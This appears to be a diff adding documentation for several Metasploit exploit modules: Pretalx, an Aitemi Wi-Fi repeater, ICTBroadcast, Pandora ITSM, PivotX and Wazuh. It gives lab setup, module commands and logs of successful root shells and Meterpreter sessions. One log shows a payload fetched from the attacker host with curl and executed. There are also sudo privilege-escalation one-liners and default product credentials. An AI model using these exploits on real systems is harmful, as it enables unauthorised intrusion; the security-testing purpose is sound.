+Pretalx uses path to `media` folder, which is used as prepend to target file path to achieve arbitrary file read. The default value is `/media`, however, it can be modified by user.
+
+### EMAIL
+
+Email of Pretalx user that can approve proposals and release schedule.
+
+### PASSWORD
+
+Password of Pretalx user that can approve proposals and release schedule.
+
+## Scenarios
+```
+msf auxiliary(scanner/http/pretalx_file_read_cve_2023_28459) > run verbose=true 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected vulnerable version 2.3.1
+[*] Register malicious proposal
+[*] Logging with credentials: [username]/[password]
+[*] Approving proposal
+[*] Adding h85WcLe4t4 to schedule
+[*] Releasing schedule
+[*] Trying to extract target file
+[*] Extraction successful
+[*] Stored results in /home/ms/.msf4/loot/20250725165914_default_192.168.168.146_pretalx.etcpas_473038.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,125 @@
+## Vulnerable Application
+
+This Metasploit module exploits an **unauthenticated OS command injection** vulnerability
+in the **Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02)**.
+
+The vulnerability exists in the `time` parameter of the `time_conf` function, accessible via the `/protocol.csp` endpoint.
+When passed to the backend, the parameter is inserted directly into a `date -s` shell
+command without sanitization, allowing arbitrary command execution as **root**.
+The exploit does **not require authentication**, **does not reboot the device**,
+and **does not affect network configuration**, making it suitable for stealthy, persistent access.
+
+The vulnerability is tracked as **CVE-2025-34152**.
+
+### Setup
+
+Purchase the vulnerable device here:
+[https://www.aliexpress.us/item/3256806767641280.html](https://www.aliexpress.us/item/3256806767641280.html)
+
+Ensure the repeater is accessible via its management interface (typically `http://192.168.11.1` when connected locally via Wi-Fi).
+
+## Verification Steps
+
+1. Connect to the repeater's Wi-Fi and obtain its IP (usually `192.168.11.1`).
+2. Launch **Metasploit Framework**.
+3. Use the module:
+```
+use exploit/linux/http/aitemi_m300_time_rce
+```
+4. Set the target IP:
+```
+set RHOSTS [TARGET_IP]
+```
+5. Choose the appropriate target:
+```
+set TARGET 0        # For simple reverse shell (netcat)
+set TARGET 1        # For Meterpreter payload (may crash HTTP server)
+```
+6. Execute the exploit:
+```
+run
+```
+
+## Options
+
+None
+
+## Scenarios
+
+### Scenario 1 – Target 0: Unix Reverse Shell (netcat)
+
+```bash
+msf6 exploit(linux/http/aitemi_m300_time_rce) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+=>  0   Unix Command Shell (reverse_netcat)
+    1   Linux Meterpreter MIPSBE (MAY crash HTTP worker)
+
+
+msf6 exploit(linux/http/aitemi_m300_time_rce) > set payload cmd/unix/reverse_netcat
+payload => cmd/unix/reverse_netcat
+msf6 exploit(linux/http/aitemi_m300_time_rce) > run http://192.168.11.1
+[*] Started reverse TCP handler on 192.168.11.208:1337 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Favicon hash matched – likely Aitemi M300 device
+[+] HTTP server version matched: lighttpd/1.4.32
+[+] HTML fingerprint matched in home.html – UI strings detected
+[+] The target is vulnerable. HTML language markers confirmed
+[*] Command shell session 4 opened (192.168.11.208:1337 -> 192.168.11.1:58090) at 2025-08-07 01:02:06 +0200
+
+id
+uid=0(root) gid=0(root)
+uname -a
+Linux Srepeater 4.4.194 #0 Fri Jun 30 03:16:53 2023 mips GNU/Linux
+ls -l
+drwxr-xr-x    2 root     root           775 Sep 25 23:32 bin
+drwxr-xr-x    3 root     root           860 Sep 25 23:32 dev
+drwxrwxr-x    1 root     root             0 Sep 25 23:33 etc
+drwxr-xr-x   11 root     root           441 Sep 25 23:32 lib
+drwxr-xr-x    2 root     root             0 Sep 25 23:32 media
+drwxr-xr-x    2 root     root             3 Sep 25 23:32 mnt
+drwxr-xr-x    5 root     root             0 Sep 25 23:32 overlay
+dr-xr-xr-x   58 root     root             0 Jan  1  1970 proc
+drwxr-xr-x   17 root     root           235 Sep 25 23:32 rom
+drwxr-xr-x    2 root     root             3 Sep 25 23:32 root
+drwxrwxr-x    2 root     root           707 Sep 25 23:32 sbin
+dr-xr-xr-x   11 root     root             0 Jan  1  1970 sys
+drwxrwxrwt   16 root     root           500 Sep 25 23:33 tmp
+drwxr-xr-x    7 root     root            89 Sep 25 23:32 usr
+lrwxrwxrwx    1 root     root             4 Sep 25 23:32 var -> /tmp
+drwxr-xr-x    1 root     root             0 Sep 25 23:32 webs
+drwxr-xr-x    4 root     root            67 Sep 25 23:32 www
+```
+
+### Scenario 2 – Target 1: Meterpreter MIPSBE Payload
+
+```bash
+msf6 exploit(linux/http/aitemi_m300_time_rce) > set target 1
+target => 1
+msf6 exploit(linux/http/aitemi_m300_time_rce) > set payload cmd/linux/http/mipsbe/meterpreter/reverse_tcp
+payload => cmd/linux/http/mipsbe/meterpreter/reverse_tcp
+msf6 exploit(linux/http/aitemi_m300_time_rce) > run http://192.168.11.1
+[*] Started reverse TCP handler on 192.168.11.208:1337 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Favicon hash matched – likely Aitemi M300 device
+[+] HTTP server version matched: lighttpd/1.4.32
+[+] HTML fingerprint matched in home.html – UI strings detected
+[+] The target is vulnerable. HTML language markers confirmed
+[*] Sending stage (1358312 bytes) to 192.168.11.1
+[*] Meterpreter session 10 opened (192.168.11.208:1337 -> 192.168.11.1:41150) at 2025-08-07 01:12:10 +0200
+
+meterpreter > sysinfo 
+Computer     : Srepeater.lan
+OS           :  (Linux 4.4.194)
+Architecture : mips
+BuildTuple   : mips-linux-muslsf
+Meterpreter  : mipsbe/linux
+meterpreter > getuid
+Server username: root
+meterpreter > 
+```
+
@@ -0,0 +1,180 @@
+## Vulnerable Application
+
+This Metasploit module exploits an **unauthenticated remote code
+execution (RCE)** vulnerability in **ICTBroadcast**.
+The vulnerability exists due to improper handling of session
+cookies in the authentication mechanism. An attacker can inject arbitrary system commands by modifying the session cookie.
+
+The issue affects **various versions of ICTBroadcast**, but
+specific impacted releases are currently unknown. The vulnerability allows an attacker to execute shell commands **without authentication**.
+
+## Options
+
+None
+
+## Testing
+
+To test the exploit, spin up a vulnerable ICTBroadcast instance with Docker.
+
+```yaml
+services:
+  db:
+    image: mariadb:10.6
+    container_name: ictmysql
+    restart: unless-stopped
+    environment:
+      MYSQL_ROOT_PASSWORD: root     
+      MARIADB_ROOT_HOST: '%'       
+      MYSQL_DATABASE: ictbroadcast
+      MYSQL_USER: ictuser
+      MYSQL_PASSWORD: ictpass
+    volumes:
+      - db_data:/var/lib/mysql
+    ports:
+      - "3306:3306"
+
+  ictbroadcast:
+    image: chocapikk/ictbroadcast-cve-2025-2611:latest
+    container_name: ictbroadcast
+    depends_on:
+      - db
+    ports:
+      - "80:80"
+      - "443:443"
+    command: >
+      bash -c "
+        composer --working-dir=/usr require stefangabos/zebra_pagination &&
+        /usr/sbin/httpd -k start &&
+        /usr/sbin/php-fpm &&
+        tail -f /dev/null
+      "
+
+volumes:
+  db_data:
+```
+
+1. Start the stack:
+
+```bash
+docker compose up -d
+```
+
+2. Verify that the login page is reachable at **`http://localhost/login.php`**.
+   The application should issue a valid session cookie on first visit.
+
+3. Run the Metasploit module.
+   The exploit will automatically harvest the session cookie (format may vary across deployments)
+   and leverage it to execute arbitrary commands via the vulnerable endpoint.
+
+## Verification Steps
+1. Start **Metasploit Framework**:
+```bash
+msfconsole
+```
+
+2. Load the module:
+```bash
+use exploit/linux/http/ictbroadcast_unauth_cookie
+```
+
+3. Set the **target IP address**:
+```bash
+set RHOSTS <TARGET_IP>
+```
+
+4. Set the **payload** for command execution:
+```bash
+set PAYLOAD cmd/unix/reverse_bash
+```
+
+5. Configure the listener:
+```bash
+set LHOST <YOUR_IP>
+set LPORT 4444
+```
+
+6. Check if the target is vulnerable:
+```bash
+check
+```
+
+7. Exploit the target:
+```bash
+exploit
+```
+
+## Scenarios
+
+### Unauthenticated Command Execution
+**Note**: Ensure that the target is vulnerable using the `check` command before running the exploit.
+
+**Note**: The session cookie is retrieved dynamically and modified for command injection.
+
+```bash
+msf6 exploit(linux/http/ictbroadcast_unauth_cookie) > run http://lab
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking ICTBroadcast via JS fingerprints
+[+] JS fingerprint found; performing timing tests
+[*] Retrieving session cookies dynamically
+[*] Found cookies: BROADCAST=49b067ae1fdfbcab3d73caa1c7e6d75a
+[+] The target is vulnerable. Injected RCE (slept 4s)
+[*] Sending stage (3090404 bytes) to 192.168.128.3
+[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 192.168.128.3:53178) at 2025-08-04 17:50:33 +0200
+
+meterpreter > sysinfo 
+Computer     : 192.168.128.3
+OS           : Red Hat 8.10 (Linux 6.15.8-2-cachyos)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > shell
+Process 877 created.
+Channel 1 created.
+SHELL=/bin/bash script -q /dev/null
+bash-4.4$ sudo -l
+sudo -l
+Matching Defaults entries for asterisk on f7681361bd20:
+    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
+    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
+    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
+    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
+    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
+    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
+    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
+
+User asterisk may run the following commands on f7681361bd20:
+    (root) NOPASSWD: /usr/sbin/asterisk
+    (root) NOPASSWD: /etc/init.d/asterisk
+    (root) NOPASSWD: /etc/init.d/httpd
+    (root) NOPASSWD: /etc/init.d/mysqld
+    (root) NOPASSWD: /etc/init.d/kannel
+    (root) NOPASSWD: /usr/sbin/ntpdate
+    (root) NOPASSWD: /usr/sbin/rabbitmqctl
+    (root) NOPASSWD: /bin/systemctl
+bash-4.4$ 
+```
+#### Low-hanging LPE via systemctl
+
+If `/bin/systemctl` is listed in sudo as NOPASSWD, you can escalate to root (outside Docker) via:
+
+```bash
+sudo systemctl 
+!sh
+```
+
+*Source: [https://gtfobins.github.io/gtfobins/systemctl/#sudo](https://gtfobins.github.io/gtfobins/systemctl/#sudo)*
+
+#### Low-hanging LPE via Asterisk NOPASSWD
+
+If `/usr/sbin/asterisk` is listed in sudo as NOPASSWD, you can obtain a root shell by:
+
+```bash
+  # 1) Start Asterisk as root, in foreground so it creates its CLI socket
+sudo asterisk -F
+
+  # 2) Connect to the Asterisk console and drop into a root shell
+sudo asterisk -r
+f7681361bd20*CLI> !sh
+sh-4.4#
+```
@@ -0,0 +1,131 @@
+## Vulnerable Application
+Pandora ITSM is a platform for Service Management & Support including a Helpdesk for support
+and customer service teams, aligned with ITIL processes.
+This module exploits a command injection vulnerability in the `name` backup setting at the
+application setup page of Pandora ITSM. This can be triggered by generating a backup with a
+malicious payload injected at the `name` parameter.
+You need to have admin access at the Pandora ITSM  Web application in order to execute this RCE.
+This access can be achieved by knowing the admin credentials to access the web application or
+leveraging a default password vulnerability in Pandora ITSM that allows an attacker to access
+the Pandora FMS ITSM database, create a new admin user and gain administrative access to the
+Pandora ITSM Web application. This attack can be remotely executed over the WAN as long as the
+MySQL services are exposed to the outside world.
+This issue affects all ITSM Enterprise editions up to `5.0.105` and is patched at `5.0.106`.
+
+The following releases were tested.
+
+**Pandora ITSM Releases:**
+* Pandora ITSM Enterprise Edition 5.0.104 Build 240802 MR97 on Ubuntu 22.04
+* Pandora ITSM Enterprise Edition 5.0.105 Build 250129 MR98 on Ubuntu 22.04
+
+## Installation steps to install Pandora ITSM Enterprise Edition on Ubuntu 22.04
+* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
+* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
+* Register for a free trial [here](https://pandorafms.com/en/itsm/free-trial/).
+* Install a plain Ubuntu 22.04 VM image.
+* Log in at the Ubuntu VM with root.
+* Run `apt update && apt upgrade` to get the latest updates.
+* Run the following command `curl -SsL https://pfms.me/deploy-pandora-itsm > deploy-pandora-itsm`.
+* Check the file `deploy-pandora-itsm` and find the `install_script` variable that refers to `itsm_deploy_enterprise_ubuntu_2204.sh`.
+* `install_script='https://packages.pandorafms.com/projects/deploy/itsm/iBxbqHhtHkOnzp1rINvG/itsm_deploy_enterprise_ubuntu_2204.sh'`
+* Use the `url` and download the file with `curl` and store it locally in the file `install.sh`.
+* `curl -LSs https://packages.pandorafms.com/projects/deploy/itsm/iBxbqHhtHkOnzp1rINvG/itsm_deploy_enterprise_ubuntu_2204.sh > install.sh`
+* Edit `install.sh` with your favorite editor and change the following line FROM:
+* INTEGRIA_PACKAGE_ENT="https://packages.pandorafms.com/c5553382c7268ea9d69dd2f889029162/latest/PandoraITSM_enterprise-latest.tar.gz"
+* TO
+* INTEGRIA_PACKAGE_ENT="https://packages.pandorafms.com/c5553382c7268ea9d69dd2f889029162/LTS/PandoraITSM_enterprise-lts.tar.gz"
+* Run `chmod +x install.sh` and execute the script `./install.sh`.
+* After successful installation of Pandora ITSM you can access the application using the `webui` via `http://your_ip/pandoraitsm`.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/pandora_itsm_auth_rce_cve_2025_4653`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `set target <0=Unix/Linux Command>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+
+### USERNAME
+This option is optional and is the username (default: admin) to authenticate with the Pandora ITSM application.
+
+### PASSWORD
+This option is optional and is the password (default: integria) in plain text to authenticate with the Pandora ITSM application.
+
+### DB_USER
+This option is required and is the username (default: pandoraitsm) to authenticate with the Pandora ITSM MySQL database.
+
+### DB_PASSWORD
+This option is required and is the password (default: P4ndor4.itsm) in plain text to authenticate with the Pandora ITSM MySQL database.
+
+### DB_PORT
+This option is required and is the MySQL database port (default: 3306) to connect to the database.
+
+## Scenarios
+### Pandora ITSM 5.0.104 on Ubuntu 22.04 -  Unix/Linux Command target
+Attack scenario: use the default admin credentials (admin:integria) of the Pandora ITSM application
+to gain the privileges for the RCE.
+```msf
+msf6 exploit(linux/http/pandora_itsm_auth_rce_cve_2025_4653) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Pandora ITSM Enterprise Edition 5.0.104 Build 240802 MR97
+[*] Trying to log in with admin credentials admin:integria at the Pandora ITSM Web application.
+[*] Succesfully authenticated at the Pandora ITSM Web application.
+[*] Saving admin credentials at the msf database.
+[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (3090404 bytes) to 192.168.201.6
+[*] Meterpreter session 45 opened (192.168.201.10:4444 -> 192.168.201.6:37374) at 2025-07-19 10:21:00 +0000
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : 192.168.201.6
+OS           : Ubuntu 22.04 (Linux 5.15.0-144-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
+/var/www/html/pandoraitsm
+meterpreter >
+```
+### Pandora ITSM 5.0.104 on Ubuntu 22.04 -  Unix/Linux Command target
+Attack scenario: use the default database credentials (pandoraitsm:P4ndor4.itsm) to create an admin user in the application
+to gain the privileges for the RCE.
+```msf
+msf6 exploit(linux/http/pandora_itsm_auth_rce_cve_2025_4653) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Pandora ITSM Enterprise Edition 5.0.104 Build 240802 MR97
+[*] Trying to log in with admin credentials admin:xxx at the Pandora ITSM Web application.
+[*] Logging in with admin credentials failed. Trying to connect to the Pandora MySQL server.
+[*] Creating new admin user with credentials hhmxr:YGMWzFjE9R for access at the Pandora ITSM Web application.
+[*] Trying to log in with new admin credentials hhmxr:YGMWzFjE9R at the Pandora ITSM Web application.
+[*] Succesfully authenticated at the Pandora ITSM Web application.
+[*] Saving admin credentials at the msf database.
+[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (3090404 bytes) to 192.168.201.6
+[*] Meterpreter session 46 opened (192.168.201.10:4444 -> 192.168.201.6:38870) at 2025-07-19 10:22:43 +0000
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : 192.168.201.6
+OS           : Ubuntu 22.04 (Linux 5.15.0-144-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
+/var/www/html/pandoraitsm
+meterpreter >
+```
+
+## Limitations
+None.
@@ -0,0 +1,56 @@
+## Vulnerable Application
+
+PivotX is free software to help you maintain dynamic sites such as weblogs, online journals and other frequently updated websites in general.
+It's written in PHP and uses MySQL or flat files as a database.
+
+Install steps:
+
+1. Install Apache2, MySQL, PHP8.2+
+1. `git clone https://github.com/pivotx/PivotX.git`
+1. Move `PivotX` to webfolder
+1. Run the following from the web folder `sudo chown -R www-data:www-data ./`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/linux/http/pivotx_rce`
+1. Do: `set USERNAME [PivotX username]`
+1. Do: `set PASSWORD [PivotX password]`
+1. Do: `set RHOSTS [target IP]`
+1. Do: `set LHOST [attacker IP]`
+1. Do: `run`
+
+## Options
+### USERNAME
+
+PivotX username.
+
+### PASSWORD
+
+PivotX password.
+
+## Scenarios
+
+```
+msf exploit(linux/http/pivotx_index_php_overwrite) > run verbose=true 
+[*] Started reverse TCP handler on 192.168.168.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected PivotX 3.0.0.pre.rc3
+[*] Logging in PivotX
+[*] Modifying file and injecting payload
+[*] Triggering payload
+[*] Sending stage (40004 bytes) to 192.168.168.146
+[*] Meterpreter session 1 opened (192.168.168.128:4444 -> 192.168.168.146:36104) at 2025-08-01 09:38:52 +0200
+
+[*] Restoring original content
+
+meterpreter > 
+meterpreter > sysinfo
+Computer    : ubuntu
+OS          : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data
+
+```
@@ -0,0 +1,196 @@
+## Vulnerable Application
+
+Pretalx is a web-based conference planning tool, used to manage call for paper submissions, talk selection and so on. It used by many major IT conferences - such as OffensiveCon, Hexacon,... Versions 2.3.1 and prior are vulnerable to arbitrary file read, which exploits unsanitized path in schedule export. The module requires set of credentials of Pretalx user and Pretalx needs to have existing conference, where the attacker can submit malicious proposal.
+
+Installation steps:
+
+1. `git clone https://github.com/pretalx/pretalx-docker.git`
+1. Change content of `Dockerfile`:
+```
+FROM python:3.10-bookworm
+
+RUN apt-get update && \
+    apt-get install -y git gettext libmariadb-dev libpq-dev locales libmemcached-dev build-essential \
+            supervisor \
+            sudo \
+            locales \
+            --no-install-recommends && \
+    apt-get clean && \
+    rm -rf /var/lib/apt/lists/* && \
+    dpkg-reconfigure locales && \
+    locale-gen C.UTF-8 && \
+    /usr/sbin/update-locale LANG=C.UTF-8 && \
+    mkdir /etc/pretalx && \
+    mkdir /data && \
+    mkdir /public && \
+    groupadd -g 999 pretalxuser && \
+    useradd -r -u 999 -g pretalxuser -d /pretalx -ms /bin/bash pretalxuser && \
+    echo 'pretalxuser ALL=(ALL) NOPASSWD:SETENV: /usr/bin/supervisord' >> /etc/sudoers
+
+ENV LC_ALL=C.UTF-8
+
+
+COPY pretalx/pyproject.toml /pretalx
+COPY pretalx/src /pretalx/src
+COPY deployment/docker/pretalx.bash /usr/local/bin/pretalx
+COPY deployment/docker/supervisord.conf /etc/supervisord.conf
+
+RUN pip3 install -U pip setuptools wheel typing && \
+    pip3 install -e /pretalx/[mysql,postgres,redis] && \
+    pip3 install pylibmc && \
+    pip3 install gunicorn && \
+    chmod -R 777 /public
+
+
+RUN python3 -m pretalx makemigrations
+RUN python3 -m pretalx migrate
+
+RUN apt-get update && \
+    apt-get install -y curl && \
+    curl -fsSL https://deb.nodesource.com/setup_20.x | bash - && \
+    apt install nodejs npm && \
+    apt-get clean && \
+    rm -rf /var/lib/apt/lists/* && \
+    python3 -m pretalx rebuild
+
+RUN chmod +x /usr/local/bin/pretalx && \
+    cd /pretalx/src && \
+    rm -f pretalx.cfg && \
+    chown -R pretalxuser:pretalxuser /pretalx /data /public && \
+    rm -f /pretalx/src/data/.secret && \
+    cat /public/static/CACHE/css/main.* >> /pretalx/src/static.dist/common/scss/uncompressed.css && \ 
+    cat /public/static/CACHE/css/main.* >> /pretalx/src/pretalx/static/common/scss/uncompressed.css && \
+    python3 /pretalx/src/manage.py compress --force
+
+USER pretalxuser
+VOLUME ["/etc/pretalx", "/data", "/public"]
+EXPOSE 80
+ENTRYPOINT ["pretalx"]
+CMD ["all"]
+```
+1. Change content of `docker-compose.yml` to following:
+```
+services:
+  pretalx:
+    image: pretalx/standalone:v2.3.1
+      # image: pretalx/dev
+    # build: .
+    container_name: pretalx
+    restart: unless-stopped
+    depends_on:
+      - redis
+      - db
+    environment:
+      # Hint: Make sure you serve all requests for the `/static/` and `/media/` paths when debug is False. See [installation](https://docs.pretalx.org/administrator/installation/#step-7-ssl) for more information
+      PRETALX_FILESYSTEM_MEDIA: /public/media
+      PRETALX_FILESYSTEM_STATIC: /public/static
+    ports:
+      - "80:80"
+    volumes:
+      - ./conf/pretalx.cfg:/etc/pretalx/pretalx.cfg:ro
+      - pretalx-data:/data
+      - pretalx-public:/public
+
+  db:
+    image: docker.io/library/postgres:15-alpine
+    container_name: pretalx-db
+    restart: unless-stopped
+    volumes:
+      - pretalx-database:/var/lib/postgresql/data
+    environment:
+      POSTGRES_PASSWORD: veryunsecureplschange # same password as one that you will put in pretalx.cfg file later on
+      POSTGRES_USER: pretalx
+      POSTGRES_DB: pretalx
+
+  redis:
+    image: redis:latest
+    container_name: pretalx-redis
+    restart: unless-stopped
+    volumes:
+      - pretalx-redis:/data
+
+volumes:
+  pretalx-database:
+  pretalx-data:
+  pretalx-public:
+  pretalx-redis:
+```
+1. `sudo docker-compose up`
+1. Setup username and password - `sudo docker exec -it pretalx pretalx init`
+1. Go to `orga/event/`
+1. Create new conference
+1. Go to `orga/event/[conference name]/schedule/rooms/`
+1. Create a room
+1. Go to `orga/event/[conference name]/`
+1. Make conference go live
+1. `sudo docker exec -u 0 -it pretalx /bin/bash`
+1. Make sure you have correct right on `/data` folder, so `pretalx` user can write export there
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/linux/http/pretalx_rce_cve_2023_28458`
+1. Do: `set CONFERENCE_NAME [conference name]`
+1. Do: `set EMAIL [user email]`
+1. Do: `set PASSWORD [password]`
+1. Do: `set PYTHON_VERSION [running Python version - e.g. python3.8]`
+1. Do: `set RHOSTS [target IP address]`
+1. Do: `run`
+1. Wait for shell to be spawned by *cron* (or run `docker exec -it pretalx pretalx runperiodic`)
+
+## Options
+
+### CONFERENCE_NAME
+
+The slug (shortcut) name of the conference. The module requires existing conference, where an attacker can submit malicious proposal (e.g. conference-secret-2025)
+
+### PYTHON_VERSION
+
+The module needs to know running python version to be able to properly select a directory for malicious hook.
+
+### EMAIL
+
+Email of Pretalx user that can approve proposals and release schedule.
+
+### PASSWORD
+
+Password of Pretalx user that can approve proposals and release schedule.
+
+## Scenarios
+```
+msf exploit(linux/http/pretalx_rce_cve_2023_28458) > run verbose=true 
+[*] Command to run on remote host: curl -so ./SeHhGRHU http://192.168.168.128:8888/Q7JGOkCYlO14PhxIQeJRIQ;chmod +x ./SeHhGRHU;./SeHhGRHU&
+[*] Fetch handler listening on 192.168.168.128:8888
+[*] HTTP server started
+[*] Adding resource /Q7JGOkCYlO14PhxIQeJRIQ
+[*] Started reverse TCP handler on 192.168.168.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected vulnerable version 2.3.1 and debug mode is enabled
+[*] Registering malicious speaker and proposal
+[*] Logging with credentials: martin_sutovsky@rapid7.com/kali
+[*] Approving proposal
+[*] Uploading resource with payload
+[*] Inserts write primitve
+[*] Adding proposal to schedule
+[*] Releasing schedule
+[*] Exporting schedule
+[*] Waiting for cron to run Python under Pretalx user
+[*] Client 192.168.168.146 requested /Q7JGOkCYlO14PhxIQeJRIQ
+[*] Sending payload to 192.168.168.146 (curl/7.74.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 192.168.168.146
+[*] Meterpreter session 1 opened (192.168.168.128:4444 -> 192.168.168.146:48816) at 2025-08-22 15:15:28 +0200
+
+meterpreter > sysinfo 
+Computer     : 172.18.0.4
+OS           : Debian 11.2 (Linux 6.8.0-60-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid 
+Server username: pretalxuser
+
+```
+
@@ -0,0 +1,365 @@
+## Vulnerable Application
+Wazuh is a free and open source platform used for threat prevention, detection, and response.
+Starting in version `4.4.0` and prior to version `4.9.1`, an unsafe deserialization vulnerability allows for remote code
+execution on Wazuh servers. DistributedAPI parameters are serialized as JSON and deserialized using `as_wazuh_object` in
+`/var/ossec/framework/wazuh/core/cluster/common.py`. If an attacker manages to inject an unsanitized dictionary in DAPI
+request/response, they can forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code.
+The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh servers in the cluster) or,
+in certain configurations, even by a compromised agent.
+
+The following Wazuh release has been tested:
+* Wazuh Server 4.8.2 multi-node cluster running on Docker Desktop
+
+See also this [attackerkb article](https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016) for more info.
+
+## Installation
+### Installation steps to install the Wazuh Server application
+* Install `Docker` on your preferred platform.
+* Here are the installation instructions for [Docker Desktop on MacOS](https://docs.docker.com/desktop/install/mac-install/).
+* Follow the steps to install [Wazuh multi-node](https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html).
+* Change the `docker-compose.yml` file in the `multi-node` directory by adding the line `- "56000:55000"` to the ports configuration
+* of the wazuh.worker section to expose port `55000` to the outside world on port `56000`.
+* You can modify the `4.8.2` version in the `yml` file to pull different versions.
+```yaml
+ # Wazuh App Copyright (C) 2017, Wazuh Inc. (License GPLv2)
+version: '3.7'
+
+services:
+  wazuh.master:
+    image: wazuh/wazuh-manager:4.8.2
+    hostname: wazuh.master
+    restart: always
+    ulimits:
+      memlock:
+        soft: -1
+        hard: -1
+      nofile:
+        soft: 655360
+        hard: 655360
+    ports:
+      - "1515:1515"
+      - "514:514/udp"
+      - "55000:55000"
+    environment:
+      - INDEXER_URL=https://wazuh1.indexer:9200
+      - INDEXER_USERNAME=admin
+      - INDEXER_PASSWORD=SecretPassword
+      - FILEBEAT_SSL_VERIFICATION_MODE=full
+      - SSL_CERTIFICATE_AUTHORITIES=/etc/ssl/root-ca.pem
+      - SSL_CERTIFICATE=/etc/ssl/filebeat.pem
+      - SSL_KEY=/etc/ssl/filebeat.key
+      - API_USERNAME=wazuh-wui
+      - API_PASSWORD=MyS3cr37P450r.*-
+    volumes:
+      - master-wazuh-api-configuration:/var/ossec/api/configuration
+      - master-wazuh-etc:/var/ossec/etc
+      - master-wazuh-logs:/var/ossec/logs
+      - master-wazuh-queue:/var/ossec/queue
+      - master-wazuh-var-multigroups:/var/ossec/var/multigroups
+      - master-wazuh-integrations:/var/ossec/integrations
+      - master-wazuh-active-response:/var/ossec/active-response/bin
+      - master-wazuh-agentless:/var/ossec/agentless
+      - master-wazuh-wodles:/var/ossec/wodles
+      - master-filebeat-etc:/etc/filebeat
+      - master-filebeat-var:/var/lib/filebeat
+      - ./config/wazuh_indexer_ssl_certs/root-ca-manager.pem:/etc/ssl/root-ca.pem
+      - ./config/wazuh_indexer_ssl_certs/wazuh.master.pem:/etc/ssl/filebeat.pem
+      - ./config/wazuh_indexer_ssl_certs/wazuh.master-key.pem:/etc/ssl/filebeat.key
+      - ./config/wazuh_cluster/wazuh_manager.conf:/wazuh-config-mount/etc/ossec.conf
+
+  wazuh.worker:
+    image: wazuh/wazuh-manager:4.8.2
+    hostname: wazuh.worker
+    restart: always
+    ulimits:
+      memlock:
+        soft: -1
+        hard: -1
+      nofile:
+        soft: 655360
+        hard: 655360
+    ports:
+      - "56000:55000"
+      - "5555:5555"
+    environment:
+      - INDEXER_URL=https://wazuh1.indexer:9200
+      - INDEXER_USERNAME=admin
+      - INDEXER_PASSWORD=SecretPassword
+      - FILEBEAT_SSL_VERIFICATION_MODE=full
+      - SSL_CERTIFICATE_AUTHORITIES=/etc/ssl/root-ca.pem
+      - SSL_CERTIFICATE=/etc/ssl/filebeat.pem
+      - SSL_KEY=/etc/ssl/filebeat.key
+      - PYTHONBREAKPOINT=remote_pdb.set_trace
+      - REMOTE_PDB_HOST=0.0.0.0
+      - REMOTE_PDB_PORT=5555
+    volumes:
+      - worker-wazuh-api-configuration:/var/ossec/api/configuration
+      - worker-wazuh-etc:/var/ossec/etc
+      - worker-wazuh-logs:/var/ossec/logs
+      - worker-wazuh-queue:/var/ossec/queue
